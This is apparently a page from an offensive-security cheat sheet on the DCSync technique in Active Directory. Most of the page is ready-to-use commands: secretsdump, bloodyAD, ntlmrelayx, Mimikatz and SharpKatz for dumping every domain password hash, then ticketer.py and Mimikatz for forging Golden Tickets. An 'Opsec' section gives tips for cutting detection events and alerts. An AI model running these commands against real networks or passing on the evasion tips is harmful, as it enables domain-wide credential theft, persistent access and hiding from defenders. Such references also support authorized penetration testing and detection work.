🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🩸 BloodHound / DCSync

DCSync

Source principal holds both GetChanges and GetChangesAll on the domain object, enabling replication of all password hashes from a domain controller without being a DC.

Applies to: User/Group/Computer β†’ Domain

Note: DCSync requires BOTH GetChanges AND GetChangesAll on the Domain object. This edge appears in BloodHound when both conditions are already met.

Linux Abuse

impacket β€” secretsdump (primary method)

# Password auth
secretsdump.py -outputfile 'dcsync' -dc-ip <dc-ip> '<domain>/<username>:<password>@<dc-ip>'

# Pass-the-Hash
secretsdump.py -outputfile 'dcsync' -hashes ':<ntlm-hash>' -dc-ip <dc-ip> '<domain>/<username>@<dc-ip>'

# Pass-the-Ticket (Kerberos)
KRB5CCNAME=<ccache> secretsdump.py -k -no-pass -outputfile 'dcsync' -dc-ip <dc-ip> '<domain>/<username>@<dc-hostname>'

# Single user only
secretsdump.py -dc-ip <dc-ip> '<domain>/<username>:<password>@<dc-ip>' -just-dc-user <target-user>

# NTLM only (faster, no Kerberos keys)
secretsdump.py -dc-ip <dc-ip> '<domain>/<username>:<password>@<dc-ip>' -just-dc-ntlm

Output files from secretsdump

dcsync.ntds         β€” LM:NT hashes for all users
dcsync.cleartext    β€” reversibly encrypted plaintext passwords
dcsync.kerberos     β€” DES, AES128, AES256 Kerberos keys

bloodyAD

bloodyAD -u <username> -p '<password>' -d <domain> --host <dc-ip> get dcSync
bloodyAD -u <username> -H '<ntlm-hash>' -d <domain> --host <dc-ip> get dcSync --user <target-user>

NTLM relay β†’ DCSync (if NTLM relay position available)

ntlmrelayx.py -t dcsync://<dc-hostname>
ntlmrelayx.py -t dcsync://<dc-hostname> -auth-smb '<domain>/<low-priv-user>:<password>'

Windows Abuse

Mimikatz

mimikatz # lsadump::dcsync /domain:<domain> /user:Administrator
mimikatz # lsadump::dcsync /domain:<domain> /user:krbtgt
mimikatz # lsadump::dcsync /domain:<domain> /all /csv

Invoke-Mimikatz (PowerShell)

Invoke-Mimikatz -Command '"lsadump::dcsync /domain:<domain> /user:Administrator"'
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:<domain> /user:krbtgt"'

SharpKatz

.\SharpKatz.exe --Command dcsync --User Administrator --Domain <domain> --DomainController <dc-hostname>

After DCSync β€” using krbtgt hash for Golden Ticket

# Linux: ticketer.py
ticketer.py -nthash '<krbtgt-ntlm-hash>' -domain-sid '<domain-sid>' -domain '<domain>' 'fakeuser'
export KRB5CCNAME=fakeuser.ccache

# Windows: Mimikatz Golden Ticket
mimikatz # kerberos::golden /user:Administrator /domain:<domain> /sid:<domain-sid> /krbtgt:<krbtgt-ntlm-hash> /ptt

Opsec

  • DCSync generates Event ID 4662 on DC with ObjectType GUID for DS-Replication-Get-Changes β€” monitored by most SIEMs
  • Impacket uses SMB/DRSR over port 445 β€” monitor for non-DC systems issuing replication RPCs
  • Request only specific users (/user:krbtgt) to limit volume of 4662 events
  • Use Kerberos (-k) instead of NTLM for secretsdump to reduce credential-based alerts
  • ExtraSids attack (cross-domain trust escalation): add target domain's Enterprise Admins SID to forged ticket